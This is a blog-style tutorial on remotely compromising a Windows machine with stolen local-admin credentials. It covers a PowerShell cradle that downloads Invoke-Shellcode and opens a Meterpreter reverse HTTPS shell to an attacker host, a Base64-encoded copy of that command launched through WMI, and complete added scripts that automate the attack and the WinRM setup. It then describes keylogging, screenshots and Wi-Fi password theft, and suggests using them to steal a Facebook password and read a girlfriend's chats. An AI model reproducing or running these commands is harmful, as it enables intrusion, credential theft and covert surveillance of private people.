Penetration Test – Exploit the network of a victim ( Part 2 ) – All things in moderation

Penetration Test – Exploit the network of a victim ( Part 2 )

In the previous post, I think you guys managed to get hold of a victim's credentials on their network. Now it is time to do what we want, I mean post-exploitation. First I will focus on Windows systems, because they are so popular nowadays, right? 😀

Actually, the Microsoft guys help us a lot here, because we are going to use PowerShell and WMI to exploit the system. PowerSploit is a framework of PowerShell modules created by Matt Graeber. You can get it here; they also ship a Visual Studio project file for us. I don't want to tell you how powerful PowerShell is, you should try it and feel it for yourself. And don't forget: if we have valid local administrative credentials and are on the target's network, we can use PowerShell to make the victim download and invoke a PowerShell script and hand us a reverse shell. So what is the code we are going to run on the victim? Here it is.

[Image: Invoke-Shellcode.ps1]

Invoke-Shellcode.ps1 injects the Meterpreter stager shellcode into a process (the PowerShell process it runs in by default, or another process such as notepad.exe if you pass -ProcessID), and that process then connects back to our host.
But first we should turn on our listener by running a script called StartListener.py.

[Image: StartListener.py]

This script also migrates Meterpreter into another process as soon as the victim host connects back to us. Before that can happen, we need to run Invoke-Shellcode.ps1 on the victim's computer remotely. Our code is here:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.103 -Lport 443 -Force

The IEX (Invoke-Expression) cradle tells PowerShell to download Invoke-Shellcode.ps1 from GitHub and run it straight from memory, and the Invoke-Shellcode call then connects back to our host at 192.168.10.103 over port 443 with a Meterpreter reverse_https stager. Secondly, keep in mind that the command line we send is visible on the victim's computer (process creation logs, Sysmon, EDR), so we pass it Base64-encoded with powershell.exe -enc. That keeps the quotes and semicolons intact on their way through WMI and defeats naive string matching, but do not count on it for stealth: -enc itself is a well-known indicator, the blob decodes in one line, it does nothing to hide the network connection, and with script block logging turned on PowerShell 5 and later writes the decoded script to event 4104 anyway. Note that -EncodedCommand expects the Base64 of the UTF-16LE ("Unicode") bytes of the script, not UTF-8. Because ps_encoder.py takes a text file as input, we put the command in a file and then encode that file.

[Image: create ps_encoder.py input file]

And our command above becomes:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAwADMAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=

Then we use WMI from PowerShell to start this encoded command on the victim. (Decode the blob back first if you want to check it; you will notice it ends with the newline that ps_encoder.py picked up from the input file, which PowerShell ignores.)

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc <Base64 string from above>" -ComputerName WIN-BK58LSTG3KP -Credential Stephen
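As an added example (not code from the original post or from PowerSploit), here is the whole procedure above done from one PowerShell session on the attacker's box: build the one-liner, encode it the way -EncodedCommand expects, check that it decodes, and start it on the target through WMI. The listener address 192.168.10.103:443, the target name WIN-BK58LSTG3KP and the account Stephen are the post's values; the powershell.exe switches and the result handling are my additions.

```powershell
# Added example, not from the original post or from PowerSploit.
# Values taken from the post: listener 192.168.10.103:443, target WIN-BK58LSTG3KP, user Stephen.
$lhost  = '192.168.10.103'
$lport  = 443
$target = 'WIN-BK58LSTG3KP'

# The download cradle plus the Invoke-Shellcode call, exactly as we would type it locally.
$cmd = "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); " +
       "Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $lhost -Lport $lport -Force"

# powershell.exe -EncodedCommand wants Base64 of the UTF-16LE ("Unicode") bytes of the
# script, not UTF-8. This is what ps_encoder.py produces from its input file, minus the
# trailing newline a text file adds (which PowerShell ignores anyway).
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cmd))

# Decode it back before sending. This is also exactly what a defender does with a
# "powershell -enc ..." command line pulled from a 4688 or Sysmon event.
$decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))
if ($decoded -ne $cmd) { throw 'Round-trip mismatch: check the encoding step' }

# The command line that will run on the target. The execution policy does not apply to
# -EncodedCommand, so no Bypass is needed; -WindowStyle Hidden keeps the window off screen.
$commandLine = "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded"

# Local-admin credential for the target; this prompts for Stephen's password.
$cred = Get-Credential -UserName "$target\Stephen" -Message 'Local administrator on the target'

# Win32_Process.Create goes over DCOM/RPC (TCP 135 plus a dynamic port), not WinRM.
# Invoke-WmiMethod is the Windows PowerShell 5.1 cmdlet; on PowerShell 7 use
# Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{ CommandLine = $commandLine }
$result = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $commandLine `
                           -ComputerName $target -Credential $cred

# Create's ReturnValue: 0 = started, 2 = access denied, 3 = insufficient privilege,
# 8 = unknown failure, 9 = path not found, 21 = invalid parameter.
switch ($result.ReturnValue) {
    0       { "Started powershell.exe on $target as PID $($result.ProcessId); watch the listener" }
    2       { 'Access denied: the account must be a local admin, and for local accounts other than the built-in Administrator the UAC remote restriction (LocalAccountTokenFilterPolicy) applies' }
    default { "Win32_Process.Create failed with ReturnValue $($result.ReturnValue)" }
}
```

Run it from Windows PowerShell on the attacker's machine with the Metasploit handler already listening. Everything in it is visible on the target: the command line with the -EncodedCommand blob lands in Security event 4688 (with command-line auditing) or Sysmon event 1, and the decoded script in PowerShell event 4104, which is why the round-trip decode above is the defender's first step as well as ours.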

If the credential is accepted (Win32_Process Create returns ReturnValue 0 and the new ProcessId), you can run whatever script you like on the victim host, for example keylogging, dumping memory from a process, taking screenshots, or pulling the SSIDs and passwords of their saved Wi-Fi profiles.

When our command succeeds we see the victim connecting back to our listener. Note that a process started remotely through Win32_Process Create is not interactive (it lives in session 0), so for screenshots and keylogging Meterpreter has to be migrated into a process in the logged-on user's session, such as explorer.exe:

[screenshot]

Then we use Metasploit to run a few dirty commands:

  • Find out what Metasploit can do for us (help):

[screenshot]

  • Get information about their system (sysinfo):

[screenshot]

  • Turn on keylogging to find out what they are typing (keyscan_start, then keyscan_dump):

[screenshot]

  • And some screenshots for fun (screenshot):

[screenshot]

Here is our victim's screen:

[screenshot]

With these features, you guys could grab their Facebook ID and password, and find out what he is chatting about with your girlfriend, just by keylogging. Easy, right?

Some tips:

First, you need to know the ComputerName of the remote computer (hostname on that machine shows it):

[screenshot]

For this to work, we need to run some commands on the remote computer and on the local computer. These steps set up WinRM, which is what PowerShell Remoting (Invoke-Command, Enter-PSSession and the CIM cmdlets) uses; the Invoke-WmiMethod call above talks DCOM/RPC instead and does not need WinRM, although both need the account to be a local administrator on the target.
– On both computers:
Firstly, check whether the Windows Remote Management service is running:

[screenshot]

If it is not running, go to services.msc and start it.

[screenshot]

Additionally, set the service to start automatically on the remote victim, so the setup survives a reboot.

Secondly, we need to run this command on both computers.

[screenshot]

After that, PowerShell is not going to ask any lame questions like this:

[screenshot]

Thirdly, you need to configure Windows PowerShell for remoting; type the following command:

[screenshot]

  • On your attacker's computer, you need to run this command:

[screenshot]

If the remote computer is not in a trusted domain, it might not be able to authenticate your credentials. To enable authentication, you need to add the remote computer to the list of trusted hosts for the local computer in WinRM. To do so, type:

[screenshot]

With these tips, I think your environment will run all our stuff without errors.
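The tips above, as an added example that is not part of the original post, written as the commands the screenshots stood for. The exact commands in the screenshots are not on the page, so these are the standard cmdlets that do what each step describes; WIN-BK58LSTG3KP and Stephen are the post's names, everything else is assumed.

```powershell
# Added example, not from the original post. The WinRM / PowerShell Remoting setup the
# tips describe, as commands. Run the "target" part in an elevated PowerShell on the victim
# (the post's lab machine) and the "attacker" part on your own box.
# WIN-BK58LSTG3KP and Stephen are the post's values; everything else is assumed.

# --- On both computers: the name you will pass as -ComputerName ---
$env:COMPUTERNAME   # hostname.exe prints the same

# --- On the target (and on the attacker too, if it should accept connections) ---
# 1. Is the WinRM service running? If not, start it, and make it start automatically
#    so the setup survives a reboot.
$winrm = Get-Service -Name WinRM
if ($winrm.Status -ne 'Running') { Start-Service -Name WinRM }
Set-Service -Name WinRM -StartupType Automatic

# 2. Stop PowerShell asking whether local scripts may run. RemoteSigned is enough for
#    local .ps1 files; it does not affect -EncodedCommand, which the execution policy
#    never covers.
Set-ExecutionPolicy RemoteSigned -Scope LocalMachine -Force

# 3. Configure PowerShell for remoting: starts WinRM, creates the HTTP listener on
#    TCP 5985, registers the session configurations and adds the firewall rule.
#    -SkipNetworkProfileCheck is needed when the network is classified as Public.
Enable-PSRemoting -Force -SkipNetworkProfileCheck

# --- On the attacker ---
# 4. Outside a domain, WinRM refuses to send your credentials to a host it cannot verify,
#    so add the target to the client's TrustedHosts list. Use '*' only in a throwaway
#    lab: for a trusted host the client skips verifying the server's identity.
$targetName = 'WIN-BK58LSTG3KP'
Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value $targetName -Force
Get-Item -Path WSMan:\localhost\Client\TrustedHosts   # check what is now trusted

# 5. Confirm WinRM answers on the target before trying anything else.
Test-WSMan -ComputerName $targetName

# 6. With that in place, the WinRM-based cmdlets accept the same local-admin credential
#    the WMI call used.
$cred = Get-Credential -UserName "$targetName\Stephen" -Message 'Local administrator on the target'
Invoke-Command -ComputerName $targetName -Credential $cred -ScriptBlock { whoami; hostname }
```

Steps 1 to 3 need an elevated prompt on the machine being configured; step 4 needs one on the attacker's machine. If Test-WSMan fails, check that TCP 5985 is reachable and that the firewall rule Enable-PSRemoting created is enabled for the network profile you are on.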

Now you guys should practice with this PowerShell tooling and find out how it works. I think you will run into some little issues when working with it, so please let me know when you do. I am always here to help. 🙂
